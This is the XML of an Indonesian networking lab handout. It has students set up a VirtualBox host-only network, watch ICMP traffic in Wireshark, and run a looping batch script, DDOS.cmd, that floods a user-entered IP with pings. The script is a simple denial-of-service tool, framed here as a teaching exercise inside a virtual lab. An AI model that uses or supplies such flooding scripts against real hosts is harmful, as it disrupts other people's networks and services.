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240" w:after="120"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Praktikum 4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>1. Pengantar</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Di praktikum kali ini kita akan membahas bagaimana melakukan Ping Flooding menggunakan batch script (Script milik Windows) dari Windows XP (atau OS lainnya) VirtualBox ke komputer Host sebagai target.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Di saat proses Ping Flooding berjalan, Wireshark harus disiapkan dan dijalankan untuk mendeteksi paket-paket yang dibanjirkan oleh Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Konfigurasi topology adalah Peer-to-Peer dengan menggunakan Virtual LAN antara Windows XP (Guest OS) dan Host. Arah serangan Ping Flooding yaitu dari WIndows XP ke Sistem Operasi Host.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Hasil akhir dari praktikum, mahasiswa dapat mengerti mekanism Ping Flooding, dan reaksi Sistem Operasi Host ketika dibanjiri banyak sekali paket data dari Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>2. Pembahasan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Konfigurasi LAN antar OS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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Buka </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirtualBox</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, lalu klik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File -&gt; Preferences</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Lalu klik bagian </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network.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5266690" cy="395224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395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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:ind w:left="720" w:hanging="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/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Dibagian Host-only Networks, pastikan ada perangkat jaringannya. Jika tidak, dibagian kanan ada tombol untuk menambahkan jaringan Host-only.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Klik tombol </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Obeng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> dibagian paling bawah 3 tombol tersebut. Lalu masukkan IP seperti berikut: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4952365" cy="274256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2365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4952365" cy="274256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2365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Pastikan DHCP Server di centang, agar Windows XP secara otomatis mendapatkan IP tanpa konfigurasi lebih lanjut.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3485515" cy="428561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5515" cy="428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Tes koneksi dengan menggunakan PING dari Windows XP ke Host, menggunakan IP dari Langkah nomor 3 gambar paling atas (192.168.56.1)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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="6050280" cy="303339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03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Jika semua sudah terkoneksi, buka Wireshark. Pastikan ada adapter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VirtualBox Host-only, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> karena adapter ini yang akan menjadi objek/target sniffing. Jika menggunakan linux, adapter yang keluar adalah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VBOXNET0. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Jika Windows, adalah </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VirtualBox Host-only Adapter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>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4361815" cy="415226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1815" cy="415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spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both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TextBody"/>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:jc w:val="both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Jika semua sudah siap, maka kita bisa melanjutkan ke pembuatan batch script Ping Flooding. Buatlah file dengan notepad di Desktop Windows XP, lalu save sebagai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DDOS.cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>. Kemudian ketik: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uppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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@echo off</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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echo Enter IP Target</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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set /p m=ip Host:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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echo Enter Packet Size</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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set /p n=Packet Size:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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color 0c</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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:DDOS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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echo Attacking Server %m%</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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ping %m% -i %n% -t &gt;nul</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:suppressLineNumbers/>
              <w:ind w:left="1134" w:right="0" w:hanging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goto DDOS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody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Sebelum kita mulai flooding, pastikan Wireshark dalam Mode Sniffing! Lalu masukkan “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>icmp &amp;&amp; ip.addr==192.168.56.101</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>” ke dalam Filter Box! Yang di mana IP diisi dengan IP Windows XP.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Jika sudah selesai double-click file tersebut untuk menjalankan, lalu ketik IP target dan ukuran paket yang diinginkan (1 – 128 bytes). Kemudian script itu akan mulai flooding paket ke target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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="6050280" cy="303403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03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Jika dilakukan dengan benar dan sesuai urutan, maka WIreshark akan menampilkan paket-paket data PING dari Windows XP.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="969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90"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9690" w:type="dxa"/>
            <w:tcBorders/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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0">
                  <wp:extent cx="6050280" cy="1254125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Jika muncul paket-paket seperti di atas, selamat kamu sukses melakukan Ping Flooding ke target! Dibuktikan dengan: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5171440" cy="381000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144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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="14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ohit Marath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ohit Marath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</Template>
  <TotalTime>33</TotalTime>
  <Application>LibreOffice/6.1.2.1$Linux_X86_64 LibreOffice_project/10$Build-1</Application>
  <Pages>6</Pages>
  <Words>382</Words>
  <Characters>2189</Characters>
  <CharactersWithSpaces>2536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2018-10-22T20:24:22Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T21:18:41Z</dcterms:modified>
  <cp:revision>16</cp:revision>
  <dc:subject/>
  <dc:title>A4</dc:title>
</cp:coreProperties>
</file>